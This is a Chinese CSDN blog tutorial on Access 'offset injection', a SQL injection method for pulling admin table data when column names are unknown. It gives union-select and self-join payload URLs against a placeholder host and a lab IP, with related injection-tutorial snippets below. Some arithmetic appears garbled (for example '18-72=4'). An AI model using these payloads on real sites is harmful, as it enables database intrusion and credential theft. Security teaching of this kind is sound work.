Access偏移注入利用

最新推荐文章于 2022-09-19 21:03:24 发布
最新推荐文章于 2022-09-19 21:03:24 发布
阅读量397 收藏
点赞数 1
分类专栏: web安全 文章标签: access
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46370858/article/details/110134257
版权

1.Access偏移注入原理
Access偏移注入原理:借用数据库的自连接查询让数据库内部发生乱序,从而偏移出所需要的字段在我们的页面上显示!

运气很重要,不能保证100%成功。
2.Access偏移注入利用场景
Access偏移注入利用场景:解决知道Access数据库中知道表名,但是得不到字段的sql注入困境。
字段名取名复杂,字典暴力破解字段名不成功。
3.Access偏移注入流程
Access偏移注入流程
1、判断字段数 order by

2、 判断表名 使用 union select * from 表名来获取

3、 开始偏移注入 利用注入公式来注入
4.Access偏移注入公式实践
Access偏移注入公式实践:偏移注入的基本公式为:

       order by 出的字段数减去*号的字段数,然而再用order by的字段数减去2倍刚才得出来的答案

也就是18-11=7

18-72=4
得到答案等于:4
例如:http://xxx.com/test.asp?id=688 union select 1,2,3,4,a.id,b.id, from (sys_admin as a inner join sys_admin as b on a.id = b.id)

#这里union select 1,2,3,4:顾名思义就是刚才得出来的长度。
#后面的是sql,可作公式。

http://192.168.1.110/Production/PRODUCT_DETAIL.asp?id=1513+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+admin
http://192.168.1.110/Production/PRODUCT_DETAIL.asp?id=1513+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,+from+admin
22-16 = 6 22-62 = 10
http://192.168.1.110/Production/PRODUCT_DETAIL.asp?id=1513+union+select+1,2,3,4,5,6,7,8,9,10,a.id,b.id,*+from+(admin+as+a+inner+join+admin+as+b+on+a.id=b.id)

一米八多的瑞兹
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
access偏移注入
weiliang369的博客
02-22 1708
access偏移注入 利用情景 1.偏移注入access偏移注入,主要是由于数据库结构的问题,其他数据库没办法利用。 2.用于解决判断出表名,得不到字段的困境。 偏移注入的特点 1.看人品和技巧的注入方法,不是100%能成功(基本上看了我的总结成功率就很高了)。 2.无需管理账号密码字段,直接爆账号密码。 利用条件 1.已知管理表名 2.已知任意字段(一个或多个多个会增加几率) 影响偏移注入成功率的因素 1.管理表的字段数越少越好(最好就三个 1.id 2.账号字段 3.密码字段
access偏移注入原理
m0_56069948的博客
01-17 589
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 前言:近段时间在学习access偏移注入时,在网上查询了大量的资料,感觉很多资料讲解的十分模糊并且我个人认为有很多不够严谨的地方,于是我便在线下经过大量测试,写出以下文章,如有错误,望指出。 如要转载,请标明出处!! 一、认识偏移注入 偏移注入的适用背景: access
SQL注入-针对asp+access网站进行SQL注入
qq_25899635的博客
05-23 4966
asp+access网站技术介绍   ASP即Active Server Pages,是MicroSoft公司开发的服务器端脚本环境,可用来创建动态交互式网页并建立强大的web应用程序。当服务器收到对ASp文件的请求时,它会处理包含在用于构建发送给浏览器的HTML(Hyper Text Markup Language,超文本标志语言)网页文件中的服务器端脚本代码。除服务器端脚本代码外,ASP文件也...
Access注入——偏移注入
MSB_WLAQ的博客
09-29 308
偏移注入简介 使用场景 一些无法查询的列名,比如权限不足的 知道表名却不知道字段 使用偏移查询主要查询字段及内容等。 使用条件 (1):知道表名(2):注入点的字段数必须要大于查询的字段 常见问题 1 .* 的作用 用于代替表内全部字段,在不能用系统自带库查字段名时。 2.偏移注入是否仅用于Access 不是,mysql也可以使用偏移注入。 3.偏移注释时联合查询后的一张表为什么要小于前一张表 联合查询必须要满足一个条件,就是前面的查询和后面的查询字段数必须相等,因为前.
Access偏移注入原理
m0_56750177的博客
04-09 411
Access偏移注入:表名知道,列名无法获取的情况下。 1、判断注入点 127.0.0.1/asp/index.asp?id=1513 and 1=1 正常 127.0.0.1/asp/index.asp?id=1513 and 1=2 错误 2、查询字段个数 127.0.0.1/asp/index.asp?id=1513 order by 22 正常 127.0.0.1/asp/index.asp?id=1513 order by 23 错误 3、爆出显位 127.0.0.1
针对asp+access网站进行sql注入利用
一米八多的瑞兹的博客
02-25 322
针对asp+access网站进行sql注入利用 1. asp+access网站技术介绍 ASP即Active Server Pages,是MicroSoft公司开发的服务器端脚本环境,可用来创建动态交互式网页并建立强大的web应用程序。当服务器收到对ASP文件的请求时,它会处理包含在用于构建发送给浏览器的HTML(Hyper Text Markup Language,超文本置标语言)网页文件中的服务器端脚本代码。除服务器端脚本代码外,ASP文件也可以包含文本、HTML(包括相关的客户端脚本)和com组件调用
Access偏移注入利用-01
最新发布
09-15
Access偏移注入利用-01
Access偏移注入
10-02
### Access偏移注入详解 #### 一、Access偏移注入概念与原理 Access偏移注入是一种针对Microsoft Access数据库的特殊SQL注入技术。这种技术利用Access数据库在处理SQL语句时的一些特性,允许攻击者通过构造特殊...
access注入详解
聚鼎安全
12-23 1452
目录Access数据库手工注入判断注入点判断数据库类型判断可以进行什么类型的注入联合注入1. 判断存在的字段数2. 作用:可以用来判断查询语句所在的表到底有多少个字段3. 猜解表名4. 猜解列名5. 猜解表名列名布尔盲注判断有无admin 这个表判断有无password这个列判断有数据长度偏移注入注入原理判断多少个列查询表的列数偏移注入移位溢注正文1. 判断字段长度2.判断表名3. 判断表长4. 开始偏移 Access数据库 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很
Access注入
zhuangsle的博客
08-25 700
Access数据库注入 一、注入原理 (一)判断数据库类型 1、前提条件 SQL server中存在内置的变量/系统表(数据库服务器基本上都会有); IIS错误提示没有屏蔽掉,并且SQL server可以返回错误提示; 浏览器能够显示相关的错误提示,一般低版本的ie浏览器可以显示相关的错误信息。 2、通过内置变量判断数据库类型 概述 Access数据中存在一些内置变量,例如User,并且其数据类型被规定为nvarchar,我们可以通过构造SQL语句,提交查询让user与整型数据进行比较,不同数据类型
【实战渗透】对 ACCESS 偏移注入实战(针对爆不出字段名)
V1040375575的博客
09-08 495
ACCESS偏移注入记录 Access偏移注入原理,基本公式为: order by 出的字段数减去*号的字段数,然而再用order by的字段数减去2倍刚才得出来的答案; 也就是: orderby = 22 * = 6个字符 2 × * = 12个字符 22 - 12 = 10个字符 注入点: www.xxx.com/Newsview.asp?id=832 查询字段数: www.xxx.com/Newsview.asp?id=832order by 16回显正常...
【漏洞扫描】——14、AWVS工程扫描
Fly_鹏程万里
03-01 2050
本篇文章我们主要介绍AWVS如何对目标网站进行扫描以及如何导出扫描报告。
Access数据库注入偏移注入
seek_2022的博客
05-02 2723
文章目录一、偏移注入使用场景二、必要的SQL知识补充(一)admin.*是什么意思?(二)联合查询的字段数问题(三)access如何查询指定数据?三、靶场实战(一)判断是否存在cookie注入(二)爆破表名(三)判断当前页面显错位(四)查询admin表字段数(五)偏移注入查询flag 一、偏移注入使用场景 在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够而无法访问系统自带库。 当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。像Sqlmap之类的工
Access-偏移注入
weixin_45634365的博客
03-02 303
在SQL注入的时候会遇到一些无法查询列名的问题,例如系统自带数据库的权限不够而无法访问系统自带库,例如Access根本没有系统自带库,需要强行猜解表名 在猜到表名无法猜到字段名的情况下,可以使用偏移注入来查询表里面的数据 像sqlmap之类的工具实际上是爆破字段的名字,但是如果字段名比较奇怪,sqlmap就无能为力了 偏移注入终比较常用的方法是移位溢注 移位溢注 #假设admin表里面有id、username、password三个字段 #admin.*代表了admin表里所有的字段 select * fro
SQL注入之ASP+Access注入
weixin_43670105的博客
06-11 584
SQL注入之ASP+Access注入 添加链接描述
Access偏移注入
qq_58000413的博客
09-19 330
> select id,username,password,1,2,3,4,5 from admin 若显错位在3,4位置,则输出password,1。=>select 1,id,username,password,2,3,4,5 from admin 则输出username,password。=>select 1,2,id,username,password,3,4,5 from admin 则输出id,username。Access数据库排序。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一米八多的瑞兹

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值